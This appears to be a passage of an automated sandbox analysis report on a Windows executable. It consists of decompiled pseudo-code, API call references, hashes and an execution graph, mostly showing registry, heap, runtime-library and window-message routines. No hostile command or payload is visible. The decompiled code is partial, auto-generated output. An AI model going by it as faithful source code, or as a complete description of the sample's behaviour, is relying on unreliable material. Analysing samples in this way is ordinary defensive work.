                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID: pYqt0yqt
                    • API String ID: 3058430110-2035559450
                    • Opcode ID: e92abb991ef77fd61edb1738c920f96238c612f6d8e32b31cf1c8921328d1ad9
                    • Instruction ID: 6c49353cee6375a8602430ad49f29ad01738cb9e001f183b89820eef730d803d
                    • Opcode Fuzzy Hash: e92abb991ef77fd61edb1738c920f96238c612f6d8e32b31cf1c8921328d1ad9
                    • Instruction Fuzzy Hash: 3931E235A2224AFFCB10EF64C8859BE3BB8BF01311F1885A9E4659B1D6D330CDA0DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00281020 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00281020() {
				void* _v8;
				int _v12;
				int _v16;
				char _v20;
				char _t16;
				char _t21;

				_t21 = 0x60;
				if(RegOpenKeyW(0x80000005, L"Software\\Fonts",  &_v8) == 0) {
					_v12 = 4;
					if(RegQueryValueExW(_v8, L"LogPixels", 0,  &_v16,  &_v20,  &_v12) == 0 && _v16 == 4) {
						_t16 = _v20;
						if(_t16 != 0) {
							_t21 = _t16;
						}
					}
					RegCloseKey(_v8);
				}
				return _t21;
			}









                    0x00281035
                    0x00281042
                    0x0028105b
                    0x0028106a
                    0x00281072
                    0x00281077
                    0x00281079
                    0x00281079
                    0x00281077
                    0x0028107f
                    0x0028107f
                    0x0028108b

                    APIs
                    • RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 0028103A
                    • RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,00281594,?,?,?,00281594), ref: 00281062
                    • RegCloseKey.ADVAPI32(?,?,00281594), ref: 0028107F
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID: LogPixels$Software\Fonts
                    • API String ID: 3677997916-4238338266
                    • Opcode ID: ec47200165fe8600c54d34ae0db90ad44790778083e78f9b90c9336b94be9767
                    • Instruction ID: 306c5256eadb9436e8dc5988c617e6a8f06c15c9f70c456ece14354245bdb028
                    • Opcode Fuzzy Hash: ec47200165fe8600c54d34ae0db90ad44790778083e78f9b90c9336b94be9767
                    • Instruction Fuzzy Hash: 3AF01975A1020AABDB10DF949C84FAF73BCAB04741F104599ED05E2180E631AA65CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0028A613 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 94%
                    			E0028A613(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x295a6c, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x295f5c - _t7;
								if(__eflags == 0) {
									_t9 = E00283CF8(__eflags);
									 *_t9 = E00283CB6(GetLastError());
									goto L17;
								} else {
									__eflags = E0028A030(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E00283CF8(__eflags);
										 *_t12 = E00283CB6(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E0028A030(_t6, _t30);
						 *((intOrPtr*)(E00283CF8(__eflags))) = 0xc;
						goto L12;
					} else {
						E00286D64(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0028A4FD(__edx, __edi, __esi, _a8);
				}
			}









                    0x0028a61c
                    0x0028a629
                    0x0028a62a
                    0x0028a62d
                    0x0028a62f
                    0x0028a63e
                    0x0028a671
                    0x0028a671
                    0x0028a674
                    0x00000000
                    0x00000000
                    0x0028a641
                    0x0028a643
                    0x0028a645
                    0x0028a645
                    0x0028a645
                    0x0028a652
                    0x0028a658
                    0x0028a65a
                    0x0028a65c
                    0x0028a6bc
                    0x0028a6bc
                    0x0028a65e
                    0x0028a65e
                    0x0028a664
                    0x0028a6a6
                    0x0028a6ba
                    0x00000000
                    0x0028a666
                    0x0028a66d
                    0x0028a66f
                    0x0028a68e
                    0x0028a6a2
                    0x0028a688
                    0x0028a688
                    0x0028a688
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0028a66f
                    0x0028a664
                    0x00000000
                    0x0028a68a
                    0x0028a677
                    0x0028a682
                    0x00000000
                    0x0028a631
                    0x0028a634
                    0x0028a63a
                    0x0028a63a
                    0x0028a68b
                    0x0028a68d
                    0x0028a61e
                    0x0028a628
                    0x0028a628

                    APIs
                    • _malloc.LIBCMT ref: 0028A621
                      • Part of subcall function 0028A4FD: __FF_MSGBANNER.LIBCMT ref: 0028A516
                      • Part of subcall function 0028A4FD: __NMSG_WRITE.LIBCMT ref: 0028A51D
                      • Part of subcall function 0028A4FD: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00286C96,00000000,00000001,00000000,?,00286F3F,00000018,00292178,0000000C,00286FCF), ref: 0028A542
                    • _free.LIBCMT ref: 0028A634
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: AllocateHeap_free_malloc
                    • String ID:
                    • API String ID: 1020059152-0
                    • Opcode ID: a1285f0af0c4e35a3a16c079fb2ede2cdaa62f9048aeef5b8f58784441b5991f
                    • Instruction ID: 8b1c38851e5a957656932905b8294c8beb5e52fbe9aacbabd78ad63360d43619
                    • Opcode Fuzzy Hash: a1285f0af0c4e35a3a16c079fb2ede2cdaa62f9048aeef5b8f58784441b5991f
                    • Instruction Fuzzy Hash: 7611083A537625AADF313F74E809B5D379C9B403A0B298427FC05961D0FE7489708F95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00288FEC Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E00288FEC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x292258);
				E00283D50(__ebx, __edi, __esi);
				_t28 = E00286908(__ebx, __edx, _t31);
				_t12 =  *0x294ba0; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E00286FB4(_t20, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E00288F9D(_t29,  *0x294de8);
					 *(_t30 - 4) = 0xfffffffe;
					E00289059();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E00286908(_t20, __edx, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E00286018(_t25, _t34);
				}
				return E00283D95(_t29);
			}








                    0x00288fec
                    0x00288fec
                    0x00288fec
                    0x00288fec
                    0x00288fec
                    0x00288fee
                    0x00288ff3
                    0x00288ffd
                    0x00288fff
                    0x00289007
                    0x0028902b
                    0x0028902d
                    0x00289033
                    0x0028903d
                    0x00289048
                    0x0028904b
                    0x00289052
                    0x00289009
                    0x00289009
                    0x0028900d
                    0x00000000
                    0x0028900f
                    0x00289014
                    0x00289014
                    0x0028900d
                    0x00289017
                    0x00289019
                    0x0028901b
                    0x0028901d
                    0x00289022
                    0x0028902a

                    APIs
                    • __getptd.LIBCMT ref: 00288FF8
                      • Part of subcall function 00286908: __getptd_noexit.LIBCMT ref: 0028690B
                      • Part of subcall function 00286908: __amsg_exit.LIBCMT ref: 00286918
                    • __getptd.LIBCMT ref: 0028900F
                    • __amsg_exit.LIBCMT ref: 0028901D
                    • __lock.LIBCMT ref: 0028902D
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00289041
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                    • String ID:
                    • API String ID: 938513278-0
                    • Opcode ID: 817099fbc43211af88f122356ecb12a9e4b82689294a8166dd8079b4875a5a39
                    • Instruction ID: 053b38cad9e0da09abf38205a6be91bbc7b74487292a8b85b21c634c357aa49d
                    • Opcode Fuzzy Hash: 817099fbc43211af88f122356ecb12a9e4b82689294a8166dd8079b4875a5a39
                    • Instruction Fuzzy Hash: 06F0B43AE377049BDB21BBB4A90BB2D37D06F01721F554109F510AB2D2CB744AA1AF96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00281090 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 93%
                    			E00281090() {
				void* _v8;
				void* _v12;
				void* _v524;
				int _t10;
				long _t13;
				long _t17;
				int _t28;
				int _t29;

				SendMessageW( *0x2970ec, 0xb0,  &_v12,  &_v8);
				_t10 = _v12;
				_t28 = _v8;
				if(_t10 != _t28) {
					if(_t10 <  *0x298270) {
						_t28 = _t10;
					}
				} else {
					 *0x298270 = _t10;
				}
				_t29 = SendMessageW( *0x2970ec, 0xc9, _t28, 0);
				_t13 = SendMessageW( *0x2970ec, 0xbb, _t29, 0);
				if( *0x298274 != _t29 ||  *0x298278 != _t28) {
					_push(_t28 - _t13 + 1);
					_t5 = _t29 + 1; // 0x1
					E00281000( &_v524, 0x231,  *0x2970fc, _t5);
					_t17 = SendMessageW( *0x2970f4, 0x29, 0,  &_v524);
					 *0x298274 = _t29;
					 *0x298278 = _t28;
					return _t17;
				} else {
					return _t13;
				}
			}











                    0x002810b6
                    0x002810b8
                    0x002810bb
                    0x002810c0
                    0x002810cf
                    0x002810d1
                    0x002810d1
                    0x002810c2
                    0x002810c2
                    0x002810c2
                    0x002810eb
                    0x002810f4
                    0x002810fc
                    0x00281111
                    0x00281112
                    0x00281123
                    0x0028113d
                    0x0028113f
                    0x00281145
                    0x00000000
                    0x00281151
                    0x00281151
                    0x00281151

                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 002810B6
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002810E1
                    • SendMessageW.USER32(?,000000BB,00000000,00000000), ref: 002810F4
                    • SendMessageW.USER32(?,00000029,00000000,?), ref: 0028113D
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 8f9e7e1eb2eb4ff65370eb654d8b063f56432c1875c7e953f8628fa1716ea4b8
                    • Instruction ID: 745d8aea2948d59e8f4131270c2d6e2400b802fcee182b485bd219908670f12e
                    • Opcode Fuzzy Hash: 8f9e7e1eb2eb4ff65370eb654d8b063f56432c1875c7e953f8628fa1716ea4b8
                    • Instruction Fuzzy Hash: 6211E679A20204EFDB20DB65FC89FAB73BDE788700F104217FA05971D0DA71A955CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0028CB2D Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0028CB2D(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0028C41F(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E0028C506(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E0028CA40(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E0028C97F(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                    0x0028cb32
                    0x0028cb38
                    0x0028cbab
                    0x00000000
                    0x0028cb3f
                    0x0028cb3f
                    0x0028cb42
                    0x0028cb5d
                    0x0028cb60
                    0x0028cb80
                    0x0028cb92
                    0x0028cb62
                    0x0028cb62
                    0x0028cb65
                    0x00000000
                    0x0028cb67
                    0x0028cb79
                    0x0028cb79
                    0x0028cb65
                    0x0028cbb0
                    0x0028cbb4
                    0x0028cb44
                    0x0028cb5c
                    0x0028cb5c
                    0x0028cb42

                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction ID: 9869ca653316b93273578c834a361c9a5a89d74068560ac355614e0913b6d024
                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction Fuzzy Hash: 2911C27A01114EBBCF126E84DC12CEE3F22FB08394B288415FE1858070D336C9B1ABA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00282610 Relevance: 6.0, APIs: 4, Instructions: 39windowCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00282610(intOrPtr _a4) {
				short _v516;
				short _v1028;

				LoadStringW( *0x2970e0, 0x179,  &_v516, 3);
				wsprintfW( &_v1028,  &_v516, _a4);
				LoadStringW( *0x2970e0, 0x171,  &_v516, 6);
				return MessageBoxW( *0x2970e4,  &_v1028,  &_v516, 0x33);
			}





                    0x00282635
                    0x00282649
                    0x00282666
                    0x00282688

                    APIs
                    • LoadStringW.USER32(?,00000179,?,00000003), ref: 00282635
                    • wsprintfW.USER32 ref: 00282649
                    • LoadStringW.USER32(?,00000171,?,00000006), ref: 00282666
                    • MessageBoxW.USER32(?,?,?,00000033), ref: 0028267E
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: LoadString$Messagewsprintf
                    • String ID:
                    • API String ID: 3675432989-0
                    • Opcode ID: 32b838d3014462a6ed3094297d467b3e168fcbfeb6e0b64198a6beaf648b8e5f
                    • Instruction ID: 8efd40926e72bb3c5ca581b9dc27891ea6d394ff418b03ed738ca7b7ff8d4a26
                    • Opcode Fuzzy Hash: 32b838d3014462a6ed3094297d467b3e168fcbfeb6e0b64198a6beaf648b8e5f
                    • Instruction Fuzzy Hash: 290144B6920218AFD711DB98EC89FF6737CBB48700F04818BB709A7181D6706A14CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00283581 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00283581() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x2970c0;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x2970c0 = _t5;
				}
				_t6 = E00286CCA(_t5, 4);
				 *0x2960a4 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x294008;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x294288) {
							break;
						}
						_t6 =  *0x2960a4;
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x294018;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x295fa0 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x294078);
					return 0;
				} else {
					 *0x2970c0 = _t26;
					_t6 = E00286CCA(_t26, 4);
					 *0x2960a4 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}













                    0x00283581
                    0x00283589
                    0x0028358c
                    0x00283597
                    0x00283599
                    0x00000000
                    0x00283599
                    0x0028358e
                    0x0028358e
                    0x0028359b
                    0x0028359b
                    0x0028359b
                    0x002835a3
                    0x002835aa
                    0x002835b1
                    0x002835d1
                    0x002835d1
                    0x002835d3
                    0x002835df
                    0x002835df
                    0x002835e2
                    0x002835e5
                    0x002835ee
                    0x00000000
                    0x00000000
                    0x002835da
                    0x002835da
                    0x002835f2
                    0x002835f3
                    0x002835f5
                    0x002835fb
                    0x0028360f
                    0x00283615
                    0x0028361f
                    0x0028361f
                    0x00283621
                    0x00283624
                    0x00283625
                    0x00283631
                    0x002835b3
                    0x002835b6
                    0x002835bc
                    0x002835c3
                    0x002835ca
                    0x00000000
                    0x002835cc
                    0x002835ce
                    0x002835d0
                    0x002835d0
                    0x002835ca

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __calloc_crt
                    • String ID: x@)
                    • API String ID: 3494438863-392705939
                    • Opcode ID: 41b07e4c4a0600adb8199d7034c3aebd0feadc80ab24ec8d04846fcc55b09d65
                    • Instruction ID: 7b1f0429bc20b716885479a35626b49f6d04e1c7125b07e020435093c934b459
                    • Opcode Fuzzy Hash: 41b07e4c4a0600adb8199d7034c3aebd0feadc80ab24ec8d04846fcc55b09d65
                    • Instruction Fuzzy Hash: 9311EC367375115BEB18EF1DBC8D6652385FB48B24758012BF605CB3D0EB34DA614740
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00283C79 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • DecodePointer.KERNEL32(?,00283CB2,00000000,00000000,00000000,00000000,00000000,0028A4F8,?,00286212,00000003,0028A51B,00000001,00000000,00000000), ref: 00283C84
                    • __invoke_watson.LIBCMT ref: 00283CA0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: DecodePointer__invoke_watson
                    • String ID: .(
                    • API String ID: 4034010525-3375098775
                    • Opcode ID: 71ff6abe595ca3f92193aa33450ca7d47877ce67ba9e60f544bbc1de77c1a542
                    • Instruction ID: 3973f6b7878f0546d7fa801e38685c4ef15b4c8840f3f5cf40c168273c45d7e8
                    • Opcode Fuzzy Hash: 71ff6abe595ca3f92193aa33450ca7d47877ce67ba9e60f544bbc1de77c1a542
                    • Instruction Fuzzy Hash: 00E0EC3651010DBBCF426F65DC0A96A3F66FB44750B454821FD1491071D633C931EB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:6.6%
                    Dynamic/Decrypted Code Coverage:65.2%
                    Signature Coverage:3.9%
                    Total number of Nodes:181
                    Total number of Limit Nodes:15
                    execution_graph 28610 3196758 28613 3196344 28610->28613 28612 3196766 28614 319634f 28613->28614 28617 3196394 28614->28617 28616 319688d 28616->28612 28618 319639f 28617->28618 28621 31963c4 28618->28621 28620 3196962 28620->28616 28622 31963cf 28621->28622 28625 31963f4 28622->28625 28624 3196a62 28624->28620 28626 31963ff 28625->28626 28631 3196c10 28626->28631 28628 3196f93 28629 31971bc 28628->28629 28635 319b3f8 28628->28635 28629->28624 28632 3196c1b 28631->28632 28633 3197e9a 28632->28633 28640 3197ee9 28632->28640 28633->28628 28636 319b400 28635->28636 28637 319b44d 28636->28637 28644 319b5a9 28636->28644 28648 319b5b8 28636->28648 28637->28629 28641 3197f3b 28640->28641 28642 3197f46 KiUserCallbackDispatcher 28641->28642 28643 3197f70 28641->28643 28642->28643 28643->28633 28645 319b5b8 28644->28645 28646 319b5ff 28645->28646 28652 319a0ec 28645->28652 28646->28637 28649 319b5c5 28648->28649 28650 319b5ff 28649->28650 28651 319a0ec 6 API calls 28649->28651 28650->28637 28651->28650 28653 319a0f7 28652->28653 28655 319c2f8 28653->28655 28656 319b904 28653->28656 28655->28655 28657 319b90f 28656->28657 28658 31963f4 6 API calls 28657->28658 28659 319c367 28658->28659 28660 319c375 28659->28660 28666 319c3d0 28659->28666 28672 319c3e0 28659->28672 28678 319e0d8 28660->28678 28683 319e0f0 28660->28683 28661 319c3a0 28661->28655 28667 319c3d4 28666->28667 28669 319c437 28667->28669 28671 319c4df 28667->28671 28688 319b9a0 GetFocus 28667->28688 28670 319c4da KiUserCallbackDispatcher 28669->28670 28669->28671 28670->28671 28673 319c3e1 28672->28673 28675 319c437 28673->28675 28677 319c4df 28673->28677 28689 319b9a0 GetFocus 28673->28689 28676 319c4da KiUserCallbackDispatcher 28675->28676 28675->28677 28676->28677 28680 319e0f0 28678->28680 28679 319e12d 28679->28661 28680->28679 28690 319e438 28680->28690 28694 319e428 28680->28694 28684 319e121 28683->28684 28685 319e12d 28683->28685 28684->28685 28686 319e438 2 API calls 28684->28686 28687 319e428 2 API calls 28684->28687 28685->28661 28686->28685 28687->28685 28688->28669 28689->28675 28691 319e439 28690->28691 28692 31993e8 LoadLibraryExW GetModuleHandleW 28691->28692 28693 319e441 28692->28693 28693->28679 28696 319e42c 28694->28696 28695 31993e8 LoadLibraryExW GetModuleHandleW 28697 319e441 28695->28697 28696->28695 28697->28679 28808 319fbf8 28809 319fbfd CreateWindowExW 28808->28809 28811 319fd1c 28809->28811 28811->28811 28698 404a83 28711 407507 GetEnvironmentStringsW 28698->28711 28700 404a94 28701 404aa6 28700->28701 28702 404a9a 28700->28702 28719 404ad7 41 API calls 3 library calls 28701->28719 28718 40650b 14 API calls 2 library calls 28702->28718 28705 404aa0 28706 404aad 28720 40650b 14 API calls 2 library calls 28706->28720 28708 404aca 28721 40650b 14 API calls 2 library calls 28708->28721 28710 404ad0 28712 407516 28711->28712 28713 407518 28711->28713 28712->28700 28722 407d48 28713->28722 28715 40752d __InternalCxxFrameHandler 28729 40650b 14 API calls 2 library calls 28715->28729 28717 407547 FreeEnvironmentStringsW 28717->28700 28718->28705 28719->28706 28720->28708 28721->28710 28723 407d86 28722->28723 28727 407d56 _unexpected 28722->28727 28731 40649b 14 API calls _com_raise_error 28723->28731 28725 407d71 RtlAllocateHeap 28726 407d84 28725->28726 28725->28727 28726->28715 28727->28723 28727->28725 28730 4087b5 EnterCriticalSection LeaveCriticalSection _unexpected 28727->28730 28729->28717 28730->28727 28731->28726 28732 7673f60 28734 76768f8 LoadLibraryA 28732->28734 28735 76769d4 28734->28735 28736 401708 28741 401e16 SetUnhandledExceptionFilter 28736->28741 28738 40170d _com_raise_error 28742 4051cb 41 API calls _com_raise_error 28738->28742 28740 401718 28741->28738 28742->28740 28743 319b6d0 28744 319b6d5 GetCurrentProcess 28743->28744 28745 319b74a GetCurrentThread 28744->28745 28747 319b743 28744->28747 28746 319b787 GetCurrentProcess 28745->28746 28748 319b780 28745->28748 28751 319b7bd 28746->28751 28747->28745 28748->28746 28749 319b7e5 GetCurrentThreadId 28750 319b816 28749->28750 28751->28749 28752 319bd00 28753 319bd01 DuplicateHandle 28752->28753 28755 319bd96 28753->28755 28812 319fef0 28813 319fe99 SetWindowLongW 28812->28813 28815 319feff 28812->28815 28814 319feac 28813->28814 28816 31992f0 28817 31992f1 28816->28817 28821 31993d8 28817->28821 28829 31993e8 28817->28829 28818 31992ff 28822 31993dc 28821->28822 28824 3199413 28822->28824 28837 3199670 28822->28837 28841 3199660 28822->28841 28823 319940b 28823->28824 28825 3199610 GetModuleHandleW 28823->28825 28824->28818 28826 319963d 28825->28826 28826->28818 28830 31993e9 28829->28830 28831 3199413 28830->28831 28835 3199670 LoadLibraryExW 28830->28835 28836 3199660 LoadLibraryExW 28830->28836 